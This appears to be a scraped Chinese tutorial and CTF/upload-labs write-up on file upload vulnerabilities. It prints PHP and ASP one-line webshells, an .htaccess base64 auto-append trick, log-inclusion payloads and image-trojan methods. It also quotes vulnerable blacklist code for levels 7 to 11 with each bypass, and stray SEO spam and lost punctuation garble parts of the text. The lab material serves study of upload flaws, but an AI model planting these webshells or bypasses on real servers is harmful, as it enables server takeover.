四川建设企业网站,页面设计说明万能模板,网站建设业务活动,网站建设如何包含数据库文件上传的大体都已经学习过了 这个假期在给他强化一下
什么是webshell
webshell是web入侵的脚本攻击工具。webshell就是一个asp或php木马后门#xff0c;黑客在入侵了一个网站后#xff0c;常常在将这些asp或php木马后门文件放置在网站服务器的web目录中#xff0c;与正常…文件上传的大体都已经学习过了 这个假期在给他强化一下
什么是webshell
webshell是web入侵的脚本攻击工具。webshell就是一个asp或php木马后门黑客在入侵了一个网站后常常在将这些asp或php木马后门文件放置在网站服务器的web目录中与正常的网页文件混在一起。然后黑客就可以用web的方式通过asp或php木马后门控制网站服务器包括上传下载文件、查看数据库、执行任意程序命令等。 web指的是在web服务器上而shell是用脚本语言编写的脚本程序webshell就是就是web的一个管理工具可以对web服务器进行操作的权限也叫webadmin。通常被黑客利用黑客通过一些上传方式将自己编写的webshell上传到web服务器的页面的目录下然后通过页面访问的形式进行入侵或者通过插入一句话连接本地的一些相关工具直接对服务器进行入侵操作。
一句话木马基本原理
利用文件上传漏洞往目标网站中上传一句话木马然后你就可以通过中国蚁剑获取和控制整个网站目录。表示后面即使执行错误也不报错。eval函数表示括号内的语句字符串什么的全都当做代码执行。 ?php eval($_POST[cmd]); ? **原理理解**相当于为中国蚁剑创建一个可以不断访问网站的门蚁剑可以通过这个密码‘cmd’传递一些可以为eval执行的字符串代码最终呈现的效果就是我们可以管理整个网站的文件。(这个密码不是正经密码而是内置的一个参数名称通过蚁剑可以利用这个参数名称上传指定参数包括可执行的语句) 例如:常见的php一句话原理 ?php eval($_POST[a])? 他是shell.php的文件内容 因为只有简短的一行所以叫一句话木马 通过apache服务器解析php文件eval函数执行命令从而控制服务器 用蚁剑、菜刀等工具提升了效率 蚁剑一个软件你告诉他木马在网站的哪个位置密码是什么连接了点一下就相当于执行了ls等等各种命令并且图形化的告诉你有哪些文件 蚁剑连接一句话木马
蚁剑通过连接一句话木马每个功能操作都是通过 POST 方式传递不同的执行代码给一句话木马当一句话木马接收到蚁剑提交过来的数据也就是代码通过 eval 函数在目标服务器上执行从而实现了控制目标服务器。
这是目前我已经有的一句话木马其中的1234.jpg/png 都是和.htaccess .user.ini文件相对应的 日志注入
nginx服务器常见的存储日志地址 /var/log/nginx
例我们可以先使用include函数包含日志来查看日志的内容并且发现关键字log被过滤因此可以使用字符串的拼接payload如下 GIF89a ?include/var/l.og/nginx/access.lo.g? 过滤符号[] ()
1.过滤“[]”
当方括号被过滤我们可以考虑直接执行system函数来获取flag
例 : system(cat ../f*);
除了直接使用system以外还可以使用{}来代替[]上传以下一句话木马同样可以实现?eval($_REQUEST{cmd});?
2.过滤“” ? system(cat ../fl*)?
3.过滤()
当()被过滤在php中在反引号中括起来的内容表示执行的是系统命令
例如system(ls) 与 ls功能相同
4.过滤“?”
可以使用伪协议.htacess里伪协议读入写的图片马用base加密。
AddType application/x-httpd-php .abc
php_value auto_append_file php://filter/convert.base64-decode/resourceshell.abc
把后缀.abc当作php解析然后shell.abc的内容用base64加密。比如?php phpinfo();?加密变成PD9waHAgcGhwaW5mbygpOz8
5.php
当对文件内容里的php进行了过滤时可以采用php短标签来绕过 #常规标签 ?php ? #php短标签 ? 图片马
一般都是只在图片的内容里面添加一句话马然后上传到服务器上在通过修改上传包名或者修改路径或者后缀名或者让服务器抛出异常从而让马运行起来的一个过程。惠州网站建设http:fz.tywl88.com认为目前这类的马主要是想通过上传来突破服务器的防御。而我们常见的识别后缀名或者文件类型的方式。不能拦截这类的请求。
目前常见的攻击就是
1通过brupsuite这类的工具来修改上传参数强行绕过js的验证如果你是通过js验证来过滤的话这个工具基本就完成突破了。所以从这个方面来说你要在服务器端增加一个后端的验证。
2如果是单纯在后台过滤用户名的话也是可以通过刚才那个工具来绕过的。后缀名的验证其实这个绕过方式比较多。比如图片文件名是a.jpg可以用a.php.jpg来进行伪装。这个也是比较容易突破的还有就是可以用工具修改上传文件的。
3还有个更加隐蔽的方法就是在图片里面加一段一句话马这个马更加隐蔽你平时看的时候基本发现不了因为看起来就跟普通图片是一样的。只有右键用记事本查看的时候才能看的到。
将一句话木马加载到图片最后构造图片马。这个时候一句话木马存在于图片txt文档最后。但是图片马并不能直接与蚁剑连接因为图片在网站中的解析格式不是php蚁剑不能通过这个后门干坏事。 需要使用文件包含漏洞 单纯的图片马并不能直接和蚁剑连接因为该文件依然是以image格式进行解析只有利用文件包含漏洞才能成功利用该木马。
phtml文件
PHTML有时叫做PHP网页是一种包含PHP一种和JavaScript或 Microsoft VBScript类似的语言脚本的网页和ASP一样PHP脚本镶嵌在网页的HTML代码之中。在页面被发送给请求的用户之前网页服务器调用PHP解释程序来解释和执行PHP脚本。含有PHP脚本的网页通常都以“.php”、“.php3”或“.phtml”作为后缀。和ASP一样PHP可以被认为是一种“动态网页”。php3、php4、php5、phtml都会被解析为php执行
asp文件
ASP即Active Server Pages是Microsoft公司开发的服务器端脚本环境可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASP文件的请求时它会处理包含在用于构建发送给浏览器的HTMLHyper Text Markup Language超文本标记语言网页文件中的服务器端脚本代码。除服务器端脚本代码外ASP文件也可以包含文本、HTML包括相关的客户端脚本和com组件调用。
ASP一句话木马是一种常见的Web后门攻击者可以通过该后门获取被攻击网站的管理权限。该漏洞可以通过在服务器中上传asp一句话木马马文件然后通过URL来访问该文件从而执行任意代码。 %eval(request(123))% aspx文件
aspx文件是微软的在服务器端运行的动态网页文件,属于ASP.NET技术。ASP.NET是由微软在·NET Framework框架中所提供开发Web应用程序的类库封装在System.Web.dll文件中显露出System.Web命名空间并提供ASP.NET网页处理、扩充以及HTTP通道的应用程序与通信处理等工作以及Web Service的基础架构。ASP.NET是ASP技术的后继者但它的发展性要比ASP技术强大许多。
aspx一句话木马是一种基于ASP.NET框架的Trojan程序它可以在服务器上执行恶意代码。这种木马可以窃取用户的敏感数据、删除/修改系统文件等其主要特点包括隐藏、易于传播以及不易发现等。
与其他Trojan相比aspx一句话木马具有以下几个优势其一没有任何文件被创建避免了杀毒软件的检查其二不需要管理员密钥就可以访问远程服务器并且可以执行任意代码。 asp与aspx的区别 .asp是asp的文件后缀名 .aspx是asp.net的文件后缀名 说直白些这种文件就是动态的网页~ asp.net又叫 asp 是动态网络编程的一种设计语言。 所谓动态网 就如 bbs 留言板聊天室等等 可以用 asp,php,jsp.net来写 那么asp就是asp.net的前身 以上这些是我补充进来的
墨者学院 WebShell文件上传漏洞分析溯源(第1题)
打开网页 发现上传窗口 上传php一句话木马 发现上传失败 上传一个照片看看 发现成功 怀疑是文件类型限制 抓包修改一下 发现上传失败 查看他的目标 尝试上传php5 上传成功用蚁剑连接 在var/www/html中找到flag upload-labs
第七关
第七关提示 源码
$is_upload false;
$msg null;
if (isset($_POST[submit])) {if (file_exists(UPLOAD_PATH)) {$deny_ext array(.php,.php5,.php4,.php3,.php2,.html,.htm,.phtml,.pht,.pHp,.pHp5,.pHp4,.pHp3,.pHp2,.Html,.Htm,.pHtml,.jsp,.jspa,.jspx,.jsw,.jsv,.jspf,.jtml,.jSp,.jSpx,.jSpa,.jSw,.jSv,.jSpf,.jHtml,.asp,.aspx,.asa,.asax,.ascx,.ashx,.asmx,.cer,.aSp,.aSpx,.aSa,.aSax,.aScx,.aShx,.aSmx,.cEr,.sWf,.swf,.htaccess);$file_name trim($_FILES[upload_file][name]);$file_ext strrchr($file_name, .);$file_ext strtolower($file_ext); //转换为小写$file_ext str_ireplace(::$DATA, , $file_ext);//去除字符串::$DATA$file_ext trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file $_FILES[upload_file][tmp_name];$img_path UPLOAD_PATH./.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload true;} else {$msg 上传出错;}} else {$msg 此文件类型不允许上传;}} else {$msg UPLOAD_PATH . 文件夹不存在,请手工创建;}
}从源码中可以看出没有对文件名后缀的空白使用trim()进行过滤借助windows系统的特性文件名中的空格在最后保存文件时会被作为空处理最后在保存的时候把后面的空格自动删除掉。
但是在程序中检查代码的时候检查到空格却不能自动删除空格。同时又绕过了黑名单的验证 trim() 函数
trim() 方法用于删除字符串的头尾空白符空白符包括空格、制表符 tab、换行符等其他空白符等。
trim() 方法不会改变原始字符串。
trim() 方法不适用于 null, undefined, Number 类型。
解题方法
上传php文件 接着抓包 在后缀名后面添加空格 在用蚁剑连接即可 点击forword 返回包 发现上传成功 第八关 查看提示以及源码 发现没有对后缀名末尾的点进行处理利用windows特性会自动去掉后缀名中最后的”.”可在后缀名中加”.”绕过
bp抓包 再返回 第九关 提示及源码 $is_upload false;
$msg null;
if (isset($_POST[submit])) {if (file_exists(UPLOAD_PATH)) {$deny_ext array(.php,.php5,.php4,.php3,.php2,.html,.htm,.phtml,.pht,.pHp,.pHp5,.pHp4,.pHp3,.pHp2,.Html,.Htm,.pHtml,.jsp,.jspa,.jspx,.jsw,.jsv,.jspf,.jtml,.jSp,.jSpx,.jSpa,.jSw,.jSv,.jSpf,.jHtml,.asp,.aspx,.asa,.asax,.ascx,.ashx,.asmx,.cer,.aSp,.aSpx,.aSa,.aSax,.aScx,.aShx,.aSmx,.cEr,.sWf,.swf,.htaccess,.ini);$file_name trim($_FILES[upload_file][name]);$file_name deldot($file_name);//删除文件名末尾的点$file_ext strrchr($file_name, .);$file_ext strtolower($file_ext); //转换为小写$file_ext trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file $_FILES[upload_file][tmp_name];$img_path UPLOAD_PATH./.date(YmdHis).rand(1000,9999).$file_ext;if (move_uploaded_file($temp_file, $img_path)) {$is_upload true;} else {$msg 上传出错;}} else {$msg 此文件类型不允许上传;}} else {$msg UPLOAD_PATH . 文件夹不存在,请手工创建;}
}
没有对后缀名中的’::$DATA’进行过滤。 补充在window的时候如果文件名::$DATA会把::$DATA之后的数据当成文件流处理,不会检测后缀名且保持::$DATA之前的文件名他的目的就是不检查后缀名 例如:phpinfo.php::$DATAWindows会自动去掉末尾的::$DATA变成phpinfo.php 抓包进行绕过 第十关 $is_upload false;
$msg null;
if (isset($_POST[submit])) {if (file_exists(UPLOAD_PATH)) {$deny_ext array(.php,.php5,.php4,.php3,.php2,.html,.htm,.phtml,.pht,.pHp,.pHp5,.pHp4,.pHp3,.pHp2,.Html,.Htm,.pHtml,.jsp,.jspa,.jspx,.jsw,.jsv,.jspf,.jtml,.jSp,.jSpx,.jSpa,.jSw,.jSv,.jSpf,.jHtml,.asp,.aspx,.asa,.asax,.ascx,.ashx,.asmx,.cer,.aSp,.aSpx,.aSa,.aSax,.aScx,.aShx,.aSmx,.cEr,.sWf,.swf,.htaccess,.ini);$file_name trim($_FILES[upload_file][name]);$file_name deldot($file_name);//删除文件名末尾的点$file_ext strrchr($file_name, .);$file_ext strtolower($file_ext); //转换为小写$file_ext str_ireplace(::$DATA, , $file_ext);//去除字符串::$DATA$file_ext trim($file_ext); //首尾去空if (!in_array($file_ext, $deny_ext)) {$temp_file $_FILES[upload_file][tmp_name];$img_path UPLOAD_PATH./.$file_name;if (move_uploaded_file($temp_file, $img_path)) {$is_upload true;} else {$msg 上传出错;}} else {$msg 此文件类型不允许上传;}} else {$msg UPLOAD_PATH . 文件夹不存在,请手工创建;}
}
代码先是去除文件名前后的空格再去除文件名最后所有的.再通过strrchar函数来寻找.来确认文件名的后缀但是最后保存文件的时候没有重命名而使用的原始的文件名导致可以利用1.php. .点空格点来绕过 strrchar函数 解题 $file_name deldot($file_name);//删除文件名末尾的点重点就是这里。在代码中可以看出对所有的过滤都是采用的是一次性过滤这里删除末尾的点. 只删除了一次那么我们就可以使用
点空格点绕过 deldot这个函数的作用就是删除末尾的点当检查到末尾的点时他会进行删除然后继续先前检测点但是这个deldot这个函数遇到空格会停下来相等于碰到空格就终止操作。所以我们 只要在上传文件的时候使用 点空格点 绕过就好了这样我们在检查的文件
原本是1.php. . 就变成了1.php. 那么1.php. ,既不在黑名单中又可以成功进行绕过又利用了系统的特性 在保存这个文件的时候系统又自动去除掉了1.php. 末尾的点。最终保存在电脑的文件就变成了1.php 但是 我的没有按这种方法绕过去 用双写后缀绕过了 第十一关
提示及源码 $is_upload false;
$msg null;
if (isset($_POST[submit])) {if (file_exists(UPLOAD_PATH)) {$deny_ext array(php,php5,php4,php3,php2,html,htm,phtml,pht,jsp,jspa,jspx,jsw,jsv,jspf,jtml,asp,aspx,asa,asax,ascx,ashx,asmx,cer,swf,htaccess,ini);$file_name trim($_FILES[upload_file][name]);$file_name str_ireplace($deny_ext,, $file_name);$temp_file $_FILES[upload_file][tmp_name];$img_path UPLOAD_PATH./.$file_name; if (move_uploaded_file($temp_file, $img_path)) {$is_upload true;} else {$msg 上传出错;}} else {$msg UPLOAD_PATH . 文件夹不存在,请手工创建;}
} 这一关重点的是str_ireplace($deny_ext,, $file_name);这个函数将文件名中出现在黑名单的这些后缀都替换成空假如我们上传一个phpinfo.php被过滤后就变成了phpinfo就没有后缀无法解析了但是她这次也是使用的是一次性过滤比如说我们上传phpinfo.phpphp那么在一次性被过滤后我们原本上传的phpinfo.phpphp,就变成了phpinfo.php。 前面的php被匹配到替换成功但是后面的第二个php没有被替换成空。
